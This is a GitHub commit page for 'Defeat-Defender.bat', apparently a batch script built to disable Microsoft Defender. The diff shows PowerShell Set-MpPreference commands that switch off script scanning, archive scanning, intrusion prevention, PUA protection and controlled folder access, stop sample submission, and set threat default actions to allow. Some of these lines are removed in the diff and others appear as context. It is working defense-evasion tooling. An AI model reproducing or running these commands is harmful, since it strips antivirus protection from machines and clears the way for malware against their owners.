Skip to content

Commit

Permalink
Update Defeat-Defender.bat
Browse files Browse the repository at this point in the history
  • Loading branch information
swagkarna authored Sep 14, 2021
1 parent e7e21c5 commit 0c201b4
Showing 1 changed file with 0 additions and 8 deletions.
8 changes: 0 additions & 8 deletions Defeat-Defender.bat
Original file line number Diff line number Diff line change
Expand Up @@ -54,14 +54,6 @@ powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled

powershell.exe -command "Set-MpPreference -PUAProtection disable"


powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

Expand Down

0 comments on commit 0c201b4

Please sign in to comment.